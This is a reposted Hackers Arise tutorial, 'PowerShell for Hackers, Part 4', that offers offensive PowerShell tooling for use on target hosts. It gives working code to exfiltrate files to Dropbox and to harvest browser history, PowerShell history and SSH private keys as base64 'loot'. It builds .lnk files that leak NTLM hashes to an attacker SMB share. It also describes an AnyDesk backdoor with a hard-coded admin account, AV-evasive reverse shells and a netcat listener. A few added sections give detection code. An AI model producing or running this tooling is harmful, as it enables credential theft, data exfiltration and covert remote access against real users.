The post PowerShell for Hackers, Part 4: Operational Scripts first appeared on Hackers Arise.

Welcome back, aspiring cyberwarriors!
Now that you know the basics, we’re ready to start writing our own scripts. There will be times when off-the-shelf tools won’t do exactly what you need, or when certain repetitive tasks begin to eat up time and attention. That’s when you’ll need to start developing your own scripts that are tailored and efficient without unnecessary overhead. PowerShell is flexible and lets you get things done fast. Below are several scripts we’ve put together for this module and each one comes with a README file to help you get started. We encourage you to test, tweak, and build on them to fit your own workflows.
File Exfiltration to Dropbox
Repo:
https://github.com/soupbone89/Scripts/tree/main/DropBox%20Exfiltration
When you can’t use RDP or Mega, it helps to have a quick way to push files out. This PowerShell script uploads files to Dropbox with minimal fuss. We adapted it from I-Am-Jakoby’s original to handle non-English filenames: any file whose name contains non-ASCII characters gets copied into C:\Users\Public\Documents under a random filename, uploaded, then deleted locally.

Setup:
1. Create a new Dropbox account with a throwaway email.
2. Generate an access token in Dropbox’s developer console.
3. Add the access token to the script. Treat that token as a credential: anyone who recovers the script (or the copy an AV quarantines) can read and write the whole Dropbox account.
Usage:
PS > . .\dropbox.ps1
PS > "file.txt" | DropBox-Upload
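The upload step, as an added example rather than the repo’s dropbox.ps1, shows why the non-ASCII rename is needed: the upload arguments ride in the Dropbox-API-Arg HTTP header, and headers must be ASCII. This version reads the token from $env:DROPBOX_TOKEN instead of hard-coding it (an assumption of this example, not something the original script does); the /loot folder name is a placeholder.

```powershell
# Added example (not the repo's dropbox.ps1): upload files to Dropbox through the
# /2/files/upload endpoint. Assumption: the token comes from $env:DROPBOX_TOKEN
# rather than being embedded in the script.
function Send-DropboxFile {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline, ValueFromPipelineByPropertyName)]
        [Alias('FullName')][string]$Path,
        [string]$Token = $env:DROPBOX_TOKEN,
        [string]$RemoteFolder = '/loot'
    )
    process {
        $file       = Get-Item -LiteralPath $Path
        $uploadPath = $file.FullName
        $remoteName = $file.Name
        $staged     = $null

        # The upload arguments travel in the Dropbox-API-Arg HTTP header, and HTTP
        # headers must be ASCII. A Cyrillic, CJK or accented filename would have to be
        # \u-escaped; the simpler route (the one the page describes) is to copy the
        # file to a random ASCII name in a world-writable folder and upload that.
        if ($remoteName -match '[^\x20-\x7E]') {
            $ext        = $file.Extension -replace '[^\x20-\x7E]', ''
            $staged     = Join-Path 'C:\Users\Public\Documents' (([IO.Path]::GetRandomFileName() -replace '\.', '') + $ext)
            Copy-Item -LiteralPath $file.FullName -Destination $staged -Force
            $uploadPath = $staged
            $remoteName = Split-Path -Leaf $staged
        }

        $apiArg = @{
            path       = "$RemoteFolder/$remoteName"
            mode       = 'add'
            autorename = $true   # never overwrite; Dropbox appends " (1)" on a name clash
            mute       = $true   # suppress the client-side "file added" notification
        } | ConvertTo-Json -Compress

        try {
            $resp = Invoke-RestMethod -Method Post `
                -Uri 'https://content.dropboxapi.com/2/files/upload' `
                -Headers @{ Authorization = "Bearer $Token"; 'Dropbox-API-Arg' = $apiArg } `
                -ContentType 'application/octet-stream' `
                -InFile $uploadPath
            [pscustomobject]@{ Local = $file.FullName; Remote = $resp.path_display; Bytes = $resp.size }
        }
        finally {
            # Remove the staged copy whether or not the upload succeeded.
            if ($staged) { Remove-Item -LiteralPath $staged -Force -ErrorAction SilentlyContinue }
        }
    }
}

# Usage: Get-ChildItem C:\loot\*.docx | Send-DropboxFile -RemoteFolder '/client-a'
```

Two caveats a practitioner will hit: /2/files/upload accepts at most 150 MB per call, so anything larger has to go through an upload session, and the Dropbox host name shows up in proxy logs as plainly as Mega would.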
Browser History & Bookmarks Exfiltration
Repo:
https://github.com/soupbone89/Scripts/tree/main/Browser%20Data%20Extraction
Browser history and bookmarks reveal where users go and what they store. This script pulls data from Chrome or Edge (both are Chromium, so the artifacts are the same: History is a SQLite database, Bookmarks is a JSON file) so you can see saved sites, login pages, and more.

Usage:
PS > . .\browser.ps1
PS > Get-BrowserData -Browser chrome -DataType history
or
PS > Get-BrowserData -Browser edge -DataType bookmarks
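Reading those two artifacts directly, as an added example that is not the repo’s browser.ps1: the Bookmarks tree is walked with ConvertFrom-Json, and the locked History database is copied before URL strings are scraped out of it. The “Default” profile path is an assumption; multi-profile installs also have “Profile 1”, “Profile 2” and so on.

```powershell
# Added example (not the repo's browser.ps1): read Chromium artifacts straight from
# disk. Chrome and Edge lay out their profile folders the same way; only the
# User Data path differs. Assumption: the "Default" profile.
function Get-ChromiumProfileDir {
    param([Parameter(Mandatory)][ValidateSet('chrome', 'edge')][string]$Browser)
    switch ($Browser) {
        'chrome' { Join-Path $env:LOCALAPPDATA 'Google\Chrome\User Data\Default' }
        'edge'   { Join-Path $env:LOCALAPPDATA 'Microsoft\Edge\User Data\Default' }
    }
}

# Bookmarks is plain JSON: folders are {"type":"folder","children":[...]},
# entries are {"type":"url","name":...,"url":...}. Walk the tree and flatten it.
function Get-ChromiumBookmarks {
    param([ValidateSet('chrome', 'edge')][string]$Browser = 'chrome')
    $file = Join-Path (Get-ChromiumProfileDir $Browser) 'Bookmarks'
    if (-not (Test-Path -LiteralPath $file)) { return }
    $tree = Get-Content -LiteralPath $file -Raw -Encoding UTF8 | ConvertFrom-Json

    function Walk-Node($node, $folder) {
        if ($node.type -eq 'url') {
            [pscustomobject]@{ Folder = $folder; Name = $node.name; Url = $node.url }
        }
        elseif ($node.children) {
            foreach ($child in $node.children) { Walk-Node $child "$folder/$($node.name)" }
        }
    }
    foreach ($root in 'bookmark_bar', 'other', 'synced') {
        if ($tree.roots.$root) { Walk-Node $tree.roots.$root '' }
    }
}

# History is a SQLite database and is locked while the browser runs, so copy it
# first. Without a SQLite driver on the box, scrape URL strings out of the copy;
# with one (the PSSQLite module, for example) you would query the urls table
# for url, title, visit_count and last_visit_time instead.
function Get-ChromiumHistory {
    param([ValidateSet('chrome', 'edge')][string]$Browser = 'chrome')
    $src = Join-Path (Get-ChromiumProfileDir $Browser) 'History'
    if (-not (Test-Path -LiteralPath $src)) { return }
    $copy = Join-Path $env:TEMP ('hist_{0}.db' -f [guid]::NewGuid())
    Copy-Item -LiteralPath $src -Destination $copy -Force
    try {
        # Latin-1 maps every byte to one character, so binary pages survive the regex.
        $raw = [IO.File]::ReadAllText($copy, [Text.Encoding]::GetEncoding(28591))
        [regex]::Matches($raw, 'https?://[^\x00-\x20"<>\\^`{|}]+') |
            ForEach-Object { $_.Value } |
            Sort-Object -Unique |
            ForEach-Object { [pscustomobject]@{ Url = $_ } }
    }
    finally {
        Remove-Item -LiteralPath $copy -Force -ErrorAction SilentlyContinue
    }
}

# Usage:
#   Get-ChromiumBookmarks -Browser edge | Format-Table Folder, Name, Url
#   Get-ChromiumHistory -Browser chrome | Where-Object Url -match 'login|sso|vpn'
```

Copying the History file rather than opening it in place is what keeps this working while the browser is running; the same copy-first rule applies to Login Data and Cookies, which are locked the same way.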
PowerShell Command History Exfiltration
Repo:
https://github.com/soupbone89/Scripts/tree/main/PowerShell%20History%20Extractor
A user’s PowerShell history (the PSReadLine file ConsoleHost_history.txt, written for interactive sessions only) can contain commands, credentials, or network paths. This script gathers each user’s ConsoleHost_history.txt and saves it for inspection.


You can also run this one‑liner to preview output on the console:
PS > Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { $u=$_.FullName.Split('\')[2]; Write-Host "`n=== History for user: $u ==="; Get-Content $_.FullName }

Usage:
PS > .\history.ps1
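Dumping the files is the easy part; triaging them is where the time goes. The function below is an added example, not the repo’s history.ps1, and flags history lines that look like credentials, secure-string conversions, mapped shares or API tokens. The regex set is an assumption for this example; tune it to what you see in the environment.

```powershell
# Added example (not the repo's history.ps1): triage every user's PSReadLine history
# for lines that probably carry secrets or network paths. The pattern list is a
# starting point, not a complete one.
function Find-HistorySecrets {
    param(
        [string[]]$Path = (Get-ChildItem 'C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt' -ErrorAction SilentlyContinue).FullName
    )
    $patterns = [ordered]@{
        'plaintext password' = '(?i)(-password\s+|/p(ass)?:|pwd=|password=)\S+'
        'secure string'      = '(?i)ConvertTo-SecureString\s+[''"]'
        'credential object'  = '(?i)PSCredential'
        'mapped share / UNC' = '(?i)(net use|\\\\[\w.-]+\\[\w$.-]+)'
        'token / api key'    = '(?i)(api[_-]?key|bearer\s+\S+|token\s*=)'
        'runas / remoting'   = '(?i)(runas\s+/user|Enter-PSSession|Invoke-Command)'
    }
    foreach ($file in $Path) {
        # C:\Users\<name>\... : index 2 of the split is the profile name.
        $user   = $file.Split('\')[2]
        $lineNo = 0
        foreach ($line in Get-Content -LiteralPath $file -ErrorAction SilentlyContinue) {
            $lineNo++
            foreach ($kv in $patterns.GetEnumerator()) {
                if ($line -match $kv.Value) {
                    [pscustomobject]@{ User = $user; Line = $lineNo; Type = $kv.Key; Command = $line.Trim() }
                    break   # one hit per line is enough
                }
            }
        }
    }
}

# Usage:
#   Find-HistorySecrets | Format-Table -AutoSize
#   Find-HistorySecrets -Path .\collected\alice_history.txt | Where-Object Type -like '*password*'
```

Two things to keep in mind about the source file: Clear-History empties the in-memory session list but not this file, and an admin who sets Set-PSReadLineOption -HistorySaveStyle SaveNothing stops it from being written at all, so an empty file on a busy admin box is itself a data point.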
AnyDesk Checker
Repo:
https://github.com/soupbone89/Scripts/tree/main/AnyDesk%20Check
AnyDesk often goes unnoticed on corporate hosts. This script scans a list of FQDNs to see which machines already have AnyDesk installed before you push a new install. It runs as SYSTEM via PsExec, so it doesn’t create a user profile folder on the remote host. Don’t count on it being silent, though: PsExec’s service installation (PSEXESVC) is one of the most widely signatured lateral-movement patterns, and many EDRs alert on it regardless of the account used.

Requirements:
1. hosts.txt (one FQDN per line)
2. Domain admin credentials
3. PsExec64.exe in the same folder
Usage
PS > .\anydesk.ps1
Once you find a host with AnyDesk, read its ID and set an unattended-access password (AnyDesk reads the password from stdin, so pipe it in):
PS > cmd.exe /c "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --get-id
PS > 'P@ssw0rd' | & 'C:\Program Files (x86)\AnyDesk\AnyDesk.exe' --set-password
AnyDesk Backdoor
Repo:
https://github.com/soupbone89/Scripts/tree/main/AnyDesk-Backdoor
If no hosts have AnyDesk, you can install it yourself on a low-traffic machine. This script downloads and installs AnyDesk, then adds a local admin (oldadministrator:P@ssw0rd125@). It’s based on a known Conti variant with its variables renamed to get past signature-based AV; renaming buys nothing against behavioural detection of a silent AnyDesk install plus a new local administrator, so expect that pairing to be what gets noticed.

Usage:
1. Land on the target host.
2. Run: .\anydesk_backdoor.ps1
Kaspersky Checker
Repo:
https://github.com/soupbone89/Scripts/tree/main/Kaspersky%20Check
Similar to the AnyDesk checker, this script detects which hosts have Kaspersky installed. Good for mapping out where AV is present so you can plan your pivots and persistence.

Requirements:
Same as AnyDesk checker.
Usage:
PS > .\kaspersky.ps1
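The AnyDesk and Kaspersky checkers above do the same job with different product names, so one added example covers both. It is not either repo’s script: it tries WinRM first and reads the registry Uninstall keys (the same source Programs and Features uses), and if WinRM is closed it probes known install paths over the C$ admin share. It assumes you hold admin rights on the targets and that hosts.txt holds one FQDN per line; the ProgramData\AnyDesk path is the location the Conti-style silent installer uses.

```powershell
# Added example (not the repo's anydesk.ps1 or kaspersky.ps1): inventory products
# across many hosts without PsExec. WinRM first (registry Uninstall keys), then a
# C$ admin-share probe as the fallback. Assumption: caller is admin on the targets.
function Get-RemoteInstalledProduct {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string[]]$ComputerName,
        [string[]]$Pattern = @('AnyDesk', 'Kaspersky'),
        [pscredential]$Credential   # applies to WinRM only; the SMB probe uses the current token
    )
    begin {
        $regPaths = @(
            'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
        )
        # Known install locations for hosts where only SMB is reachable.
        $filePaths = @{
            AnyDesk   = @('Program Files (x86)\AnyDesk\AnyDesk.exe', 'ProgramData\AnyDesk\AnyDesk.exe')
            Kaspersky = @('Program Files (x86)\Kaspersky Lab')
        }
    }
    process {
        foreach ($computer in $ComputerName) {
            $computer = $computer.Trim()
            if (-not $computer) { continue }
            $found = @()
            try {
                $icm = @{ ComputerName = $computer; ErrorAction = 'Stop' }
                if ($Credential) { $icm.Credential = $Credential }
                $found = @(Invoke-Command @icm -ScriptBlock {
                    $paths = $using:regPaths; $pats = $using:Pattern
                    Get-ItemProperty -Path $paths -ErrorAction SilentlyContinue |
                        Where-Object {
                            $name = $_.DisplayName
                            $name -and ($pats | Where-Object { $name -like "*$_*" })
                        } |
                        Select-Object DisplayName, DisplayVersion, InstallLocation
                })
                $via = 'WinRM'
            }
            catch {
                $via = 'SMB'
                $found = @(foreach ($kv in $filePaths.GetEnumerator()) {
                    if (-not ($Pattern | Where-Object { $kv.Key -like "*$_*" })) { continue }
                    foreach ($rel in $kv.Value) {
                        $unc = "\\$computer\C$\$rel"
                        if (Test-Path -LiteralPath $unc -ErrorAction SilentlyContinue) {
                            [pscustomobject]@{ DisplayName = $kv.Key; DisplayVersion = $null; InstallLocation = $unc }
                        }
                    }
                })
            }
            if ($found.Count -eq 0) {
                [pscustomobject]@{ Computer = $computer; Product = '(none)'; Version = $null; Location = $null; Via = $via }
            }
            foreach ($p in $found) {
                [pscustomobject]@{ Computer = $computer; Product = $p.DisplayName; Version = $p.DisplayVersion; Location = $p.InstallLocation; Via = $via }
            }
        }
    }
}

# Usage: Get-Content .\hosts.txt | Get-RemoteInstalledProduct | Format-Table -AutoSize
```

The Via column tells you which channel worked, which matters for the next step: a host reachable only over SMB is one where you will be back to PsExec-style execution, while a WinRM host lets you run --get-id in the same Invoke-Command session.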
SMB Hash Leak
Repo:
https://github.com/soupbone89/Scripts/tree/main/SMB%20Hash%20Leak
This script crafts .lnk shortcuts whose icon points at an SMB share on a host you control (the share need not exist; your listener answers the connection). When a user opens the folder containing the shortcut, Explorer resolves the icon while rendering the listing, so no click is needed, and the machine authenticates to your server with NTLM. You capture the Net-NTLMv2 challenge/response with Responder or Inveigh and crack it offline. Note that a captured Net-NTLMv2 response cannot be used for pass-the-hash; if cracking fails, relaying it (for example with ntlmrelayx) against hosts that don’t enforce SMB signing is the other option.

Pick filenames that fit into existing shares to avoid suspicion.
Usage:
PS > . .\leak.ps1
PS > Create-SMBHashLeakLnk -LnkFilePath ".\grab.lnk" -SmbSharePath "\\192.168.254.43\share\file.exe" -Description "Please wait…"
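What such a shortcut looks like from both sides, as an added example that is not the repo’s leak.ps1: the first function builds a .lnk through WScript.Shell with a UNC icon path, the second walks a share and reports every shortcut whose icon or target points at a host outside an allow-list, which is how a defender finds these. The IP, share, icon name and the *.corp.example allow-list are placeholders; notepad.exe is used as the target so the shortcut still does something harmless if clicked.

```powershell
# Added example (not the repo's leak.ps1): build a shortcut whose icon lives on a
# UNC path, and the audit that finds such shortcuts. All host names are placeholders.
function New-UncIconShortcut {
    param(
        [Parameter(Mandatory)][string]$LnkPath,
        [Parameter(Mandatory)][string]$UncIconPath,   # e.g. \\192.168.254.43\share\icon.ico
        [string]$TargetPath  = "$env:SystemRoot\System32\notepad.exe",
        [string]$Description = 'Please wait...'
    )
    # WScript.Shell wants an absolute path; resolve relative ones against the PS location.
    $full  = $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($LnkPath)
    $shell = New-Object -ComObject WScript.Shell
    $lnk   = $shell.CreateShortcut($full)
    $lnk.TargetPath  = $TargetPath
    $lnk.Description = $Description
    # Explorer fetches the icon while it renders the folder listing, so the SMB
    # connection, and the NTLM authentication that rides on it, happens on view
    # rather than on click. ",0" selects icon index 0 inside the file.
    $lnk.IconLocation = "$UncIconPath,0"
    $lnk.Save()
    Get-Item -LiteralPath $full
}

# Defender side: list every .lnk under a root whose icon or target points at a UNC
# host outside the allow-list. CreateShortcut on an existing .lnk loads it.
function Find-UncShortcut {
    param(
        [Parameter(Mandatory)][string]$Root,
        [string[]]$TrustedHost = @('*.corp.example')   # assumption: your own file servers
    )
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -LiteralPath $Root -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            foreach ($prop in 'IconLocation', 'TargetPath') {
                $value = $lnk.$prop
                if ($value -match '^\\\\([^\\]+)\\') {
                    $uncHost = $Matches[1]
                    if (-not ($TrustedHost | Where-Object { $uncHost -like $_ })) {
                        [pscustomobject]@{ Lnk = $_.FullName; Property = $prop; Value = $value; Host = $uncHost }
                    }
                }
            }
        }
}

# Usage:
#   New-UncIconShortcut -LnkPath .\Q3-report.lnk -UncIconPath '\\192.168.254.43\share\icon.ico'
#   Find-UncShortcut -Root '\\fileserver\public' | Format-Table -AutoSize
```

A raw IP in the icon path is the giveaway the audit keys on; a planted shortcut that names a host which looks like an internal server blends in better, which is the same reason the page says to pick filenames that fit the share.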
SSH Key Exfiltration
Repo:
https://github.com/soupbone89/Scripts/tree/main/SSH%20Key%20Extraction
This script exfiltrates SSH keys from their default locations and encodes all the collected data in base64. If needed, you can also specify a custom directory where the keys are stored.

To read the extracted data, simply decode the base64 output.
Usage:
PS > . .\ssh.ps1
PS > $data = Get-Ssh
Or specify a custom directory where the keys are stored:
PS > $data = Get-Ssh -sshKeyDirectoryPath "C:\Custom\Path\To\.ssh"
Decode the loot:
PS > [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($data))
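The thing worth knowing about each collected key is whether it has a passphrase, since an unencrypted private key is usable at once while an encrypted one still has to be cracked. The added example below (not the repo’s ssh.ps1) bundles the usual .ssh files as JSON, base64-encodes the bundle the same way the page describes, and marks every private key as encrypted or not by reading the format header: Proc-Type for legacy PEM, the Encryption line for PuTTY .ppk, and the cipher name that the new OpenSSH format stores right after its openssh-key-v1 magic. JSON as the bundle format is this example’s choice, not something the original script promises.

```powershell
# Added example (not the repo's ssh.ps1): collect SSH material and flag whether each
# private key is passphrase-protected. Bundle format (JSON) is this example's choice.
function Test-SshKeyEncrypted {
    param([Parameter(Mandatory)][string]$Text)
    if ($Text -match 'Proc-Type:\s*4,ENCRYPTED') { return $true }                 # legacy PEM (ssh-keygen -m PEM)
    if ($Text -match '(?m)^Encryption:\s*(\S+)') { return $Matches[1] -ne 'none' } # PuTTY .ppk
    if ($Text -match 'BEGIN OPENSSH PRIVATE KEY') {
        # New OpenSSH format: base64 of "openssh-key-v1\0" | uint32 len | ciphername | ...
        $body   = ($Text -replace '-----[^-]+-----', '') -replace '\s', ''
        $bytes  = [Convert]::FromBase64String($body)
        $len    = ($bytes[15] -shl 24) -bor ($bytes[16] -shl 16) -bor ($bytes[17] -shl 8) -bor $bytes[18]
        $cipher = [Text.Encoding]::ASCII.GetString($bytes, 19, $len)
        return $cipher -ne 'none'
    }
    return $false   # legacy PEM without a Proc-Type header is unencrypted
}

function Get-SshLoot {
    param(
        [string[]]$Directory = (Get-ChildItem 'C:\Users\*\.ssh' -Directory -ErrorAction SilentlyContinue).FullName
    )
    $items = foreach ($dir in $Directory) {
        Get-ChildItem -LiteralPath $dir -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match '^(id_\w+|.*\.(pem|ppk)|config|known_hosts|authorized_keys)$' } |
            ForEach-Object {
                $text      = [string](Get-Content -LiteralPath $_.FullName -Raw)
                $isPrivate = ($text -match 'PRIVATE KEY-----') -or ($text -match '(?m)^PuTTY-User-Key-File')
                if ($isPrivate)                 { $kind = 'private' }
                elseif ($_.Name -like '*.pub')  { $kind = 'public'  }
                else                            { $kind = 'other'   }
                $encrypted = if ($isPrivate) { Test-SshKeyEncrypted $text } else { $null }
                [pscustomobject]@{ Path = $_.FullName; Kind = $kind; Encrypted = $encrypted; Content = $text }
            }
    }
    # -InputObject with @() keeps a single hit as a one-element array and an empty run as [].
    $json = ConvertTo-Json -InputObject @($items) -Depth 3 -Compress
    [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($json))
}

function Expand-SshLoot {
    param([Parameter(Mandatory)][string]$Base64)
    [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($Base64)) | ConvertFrom-Json
}

# Usage:
#   $b64 = Get-SshLoot
#   Expand-SshLoot $b64 | Select-Object Path, Kind, Encrypted
#   Expand-SshLoot (Get-SshLoot -Directory 'C:\Custom\Path\To\.ssh') | Where-Object Encrypted -eq $false
```

The config and known_hosts files are worth collecting alongside the keys: config maps key files to host aliases and usernames, and known_hosts (unless hashed) lists the servers the key has been used against, which is exactly the target list you need to make use of an unencrypted key.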
Bonus: AV-evasive Reverse Shells
As a small bonus, we want to share a useful tool created by I-Am-Jakoby that lets you generate AV-evasive PowerShell reverse shells. These shells are polymorphic, meaning each one is slightly different every time you generate it, so there is no stable string for a signature to key on. At the time of writing, most antivirus engines, Defender included, don’t flag them; that is a window rather than a guarantee, since the evasion is against static signatures only.
To get started, head over to:
https://powershellforhackers.com/tools/revshell
The interface is straightforward. Just enter the IP address and port of your C2 server where your listener is running. The tool will generate a custom reverse shell for you.

Copy and paste the shell into a PowerShell prompt on the target. If Defender is active, you’ll notice it doesn’t flag anything.

Make sure your listener is already up and running before you execute the shell.
c2 > nc -lvnp 9001

Once that’s done, we have a connection.
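The flip side of polymorphism, shown here as an added example that is neither the page’s code nor the generator’s: renaming variables and functions changes every string an AV signature might match, but a TCP reverse shell still has to touch the same .NET types and methods, and PowerShell script block logging (event 4104) records the code as it executes, after any string-building has been unwrapped. The check below scores a script block on those fixed parts and reads 4104 events when run on a host with script block logging enabled; the two sample blocks at the bottom are constructed for this example, and the indicator list is a starting point rather than a complete one.

```powershell
# Added example (not from the page or the generator): detection over PowerShell
# script block logs. Sample blocks below are constructed; indicator list is a start.
$script:ShellIndicators = [ordered]@{
    socket = 'System\.Net\.Sockets\.TcpClient|\[Net\.Sockets\.TcpClient\]'
    stream = '\.GetStream\(\)'
    exec   = 'Invoke-Expression|\biex\b'
    encode = 'Text\.(ASCII|UTF8)Encoding|\[Text\.Encoding\]::(ASCII|UTF8)'
}

function Test-ReverseShellScriptBlock {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Text)
    process {
        $hits = @(foreach ($kv in $script:ShellIndicators.GetEnumerator()) {
            if ($Text -match $kv.Value) { $kv.Key }
        })
        # One indicator alone is common in admin scripts; a socket combined with
        # stream I/O or code execution rarely is.
        $suspicious = ($hits -contains 'socket') -and (($hits -contains 'stream') -or ($hits -contains 'exec'))
        [pscustomobject]@{
            Suspicious = $suspicious
            Indicators = ($hits -join ',')
            Preview    = $Text.Substring(0, [Math]::Min(80, $Text.Length))
        }
    }
}

function Find-ReverseShellEvents {
    param([datetime]$Since = (Get-Date).AddDays(-1), [int]$MaxEvents = 1000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # For 4104, Properties[2] is ScriptBlockText ([0] MessageNumber, [1] MessageTotal,
            # [3] ScriptBlockId, [4] Path). Long blocks arrive split across several events.
            $result = Test-ReverseShellScriptBlock -Text ([string]($_.Properties[2].Value))
            if ($result.Suspicious) {
                [pscustomobject]@{ Time = $_.TimeCreated; Indicators = $result.Indicators; Preview = $result.Preview }
            }
        }
}

# Constructed samples: a renamed-variable shell skeleton (the body is elided) and a
# benign admin one-liner. Only the first should score as suspicious.
$samples = @(
    '$q7=New-Object System.Net.Sockets.TcpClient($h,$p);$m2=$q7.GetStream();...;iex $c9 2>&1 | Out-String'
    'Get-ChildItem C:\Users -Directory | Export-Csv .\users.csv -NoTypeInformation'
)
$samples | Test-ReverseShellScriptBlock | Format-Table Suspicious, Indicators, Preview

# On a live host with script block logging turned on:
#   Find-ReverseShellEvents -Since (Get-Date).AddHours(-6) | Format-Table -AutoSize
```

Script block logging is off by default and is switched on through the “Turn on PowerShell Script Block Logging” policy; AMSI feeds Defender the same unwrapped text, so what the generator defeats today is the static scan of the pasted string, not the runtime view of what it does.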
Summary
PowerShell is a versatile tool for automating tasks and building custom offensive scripts. Whether you’re automating large data pulls, scanning for remote‑access tools, or harvesting credentials, these examples show you how to get started. Defenders can also use this knowledge to spot and block these techniques in their own environments.
Look for our upcoming PowerShell for Hackers training in 2026!
Source: HackersArise
Source Link: https://hackers-arise.com/powershell-for-hackers-part-4-operational-scripts/